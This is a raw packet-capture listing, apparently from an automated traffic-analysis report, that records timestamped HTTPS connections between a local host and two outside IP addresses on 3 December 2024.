                                                                                                                      Dec 3, 2024 08:55:42.524880886 CET50013443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.524945021 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.525007010 CET50013443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.532871008 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.533102036 CET50015443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.533118010 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.533447981 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.533710957 CET50015443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.533777952 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.533818007 CET50015443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.543956995 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.544759035 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.553698063 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.554011106 CET50016443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.554033041 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.554368019 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.554712057 CET50016443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.554768085 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.554855108 CET50016443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.571329117 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.573293924 CET50015443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.573308945 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.595331907 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.680660009 CET4435001813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.681188107 CET50018443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:42.681216955 CET4435001813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.686336994 CET50018443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:42.686342955 CET4435001813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.691906929 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.691943884 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.692013979 CET50009443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.692034960 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.700062990 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.700108051 CET50009443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.700124025 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.700148106 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.700161934 CET50009443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.700195074 CET50009443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.725039005 CET50009443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.725055933 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.725446939 CET50028443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.725476027 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.725548983 CET50028443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.726443052 CET50028443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.726458073 CET44350028196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.784878969 CET50010443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:42.784905910 CET4435001013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.800471067 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.800502062 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.800509930 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.800563097 CET50011443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.800580978 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.817125082 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.817193985 CET50011443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.817194939 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.817249060 CET50011443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.827061892 CET50011443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.827080011 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.827477932 CET50029443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.827505112 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.827569962 CET50029443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.828747988 CET50029443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.828762054 CET44350029196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.848206997 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.848630905 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.848695040 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.849715948 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.849792957 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.851898909 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.851974964 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.852066040 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:42.852082014 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:42.904376984 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.135212898 CET4435001813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.135247946 CET4435001813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.135297060 CET4435001813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.135442972 CET50018443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.135442972 CET50018443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.194653988 CET50018443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.194674015 CET4435001813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.194689035 CET50018443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.194694042 CET4435001813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.204659939 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.204687119 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.204695940 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.204727888 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.204741001 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.204756021 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.204782963 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.205605030 CET50031443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.205648899 CET4435003113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.205709934 CET50031443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.206537008 CET50031443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.206562042 CET4435003113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.210860014 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.210918903 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.210927963 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.217916965 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.217982054 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.285335064 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.285362005 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.285367966 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.285398960 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.285418034 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.285444975 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.285459042 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.310836077 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.310900927 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.310929060 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.310982943 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.323342085 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.323369980 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.323379040 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.323410988 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.323554039 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.323554039 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.323600054 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.352570057 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.352591991 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.353174925 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.353216887 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.353292942 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.356415987 CET50032443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.356429100 CET44350032196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.362519979 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.362552881 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.362612009 CET50013443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.362636089 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.378456116 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.379389048 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.379452944 CET50013443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.379461050 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.379475117 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.379528046 CET50013443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.383862019 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.383893013 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.383900881 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.383943081 CET50015443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.383950949 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.383989096 CET50015443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.388631105 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.388657093 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.388736963 CET50016443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.388772011 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.390917063 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.390974998 CET50015443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.405251026 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.405302048 CET50016443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.405313969 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.405333042 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.405378103 CET50016443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.417686939 CET4435002013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.457427025 CET50020443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.515187979 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.536901951 CET50020443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.536923885 CET4435002013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.537741899 CET50020443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.537746906 CET4435002013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.538351059 CET50021443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.538376093 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.538773060 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.540313005 CET50021443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.540373087 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.540472984 CET50021443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.541583061 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.541601896 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.544858932 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.544887066 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.544945955 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.548703909 CET50033443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.548717976 CET44350033196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.553092003 CET50016443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.553107023 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.553559065 CET50015443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.553590059 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.554223061 CET50013443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.554229021 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.554838896 CET50034443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.554877996 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.554935932 CET50034443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.556288004 CET50034443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.556308985 CET44350034196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.568417072 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.568428040 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.568456888 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.568474054 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.568506002 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.568527937 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.581124067 CET50035443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.581156015 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.581223011 CET50035443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.581465960 CET50035443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.581480980 CET44350035196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.583947897 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.583971977 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.584036112 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.584446907 CET50036443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.584459066 CET44350036196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.587332010 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.589530945 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.589539051 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.589569092 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.589589119 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.589632034 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.596271992 CET4435002213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.597486973 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.597554922 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.597618103 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.597774982 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.597817898 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.597845078 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.597867966 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.598211050 CET50037443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.598234892 CET44350037196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.598299026 CET50037443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.600708008 CET50037443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.600719929 CET44350037196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.602085114 CET50022443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.602114916 CET4435002213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.605340004 CET50022443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.605345011 CET4435002213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.694025040 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.694056034 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.694062948 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.694092035 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.694118023 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.694159985 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.694178104 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.700395107 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.700472116 CET44350019196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.700535059 CET50019443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.701014996 CET50038443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.701054096 CET44350038196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.701122999 CET50038443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.702616930 CET50038443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.702634096 CET44350038196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.767535925 CET4435002313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.768050909 CET50023443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.768115044 CET4435002313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.768589020 CET50023443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.768603086 CET4435002313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.782922983 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.783190966 CET50024443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.783205032 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.783557892 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.784014940 CET50024443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.784089088 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.784203053 CET50024443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:43.827363968 CET44350024196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.865478992 CET4435002013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.869240046 CET4435002013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.869308949 CET50020443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.869385958 CET50020443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.869405031 CET4435002013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.869415045 CET50020443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.869421959 CET4435002013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.872622013 CET50039443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.872653961 CET4435003913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:43.872730017 CET50039443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.872884989 CET50039443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:43.872894049 CET4435003913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.049312115 CET4435002213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.052931070 CET4435002213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.053009033 CET50022443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.053062916 CET50022443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.053077936 CET4435002213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.053092957 CET50022443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.053097963 CET4435002213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.056174040 CET50040443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.056222916 CET4435004013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.056293964 CET50040443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.056448936 CET50040443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.056464911 CET4435004013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.143299103 CET44350025196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.143580914 CET50025443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.143601894 CET44350025196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.143939018 CET44350025196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.144224882 CET50025443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.144277096 CET44350025196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.144362926 CET50025443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.191320896 CET44350025196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.220868111 CET4435002313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.220942020 CET4435002313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.221005917 CET50023443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.221259117 CET50023443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.221277952 CET4435002313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.221295118 CET50023443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.221302986 CET4435002313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.224634886 CET50041443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.224674940 CET4435004113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.224767923 CET50041443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.224948883 CET50041443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.224961996 CET4435004113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.321166992 CET4435002613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.321887016 CET50026443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.321916103 CET4435002613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.323260069 CET50026443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:44.323265076 CET4435002613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.353039980 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.353071928 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.353172064 CET50021443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.353178978 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.361418009 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.361478090 CET50021443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.361483097 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.361857891 CET50021443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.361884117 CET44350021196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.361938000 CET50021443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.362255096 CET50042443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.362296104 CET44350042196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:44.362355947 CET50042443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.362993956 CET50042443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:44.363008976 CET44350042196.22.142.143192.168.2.4
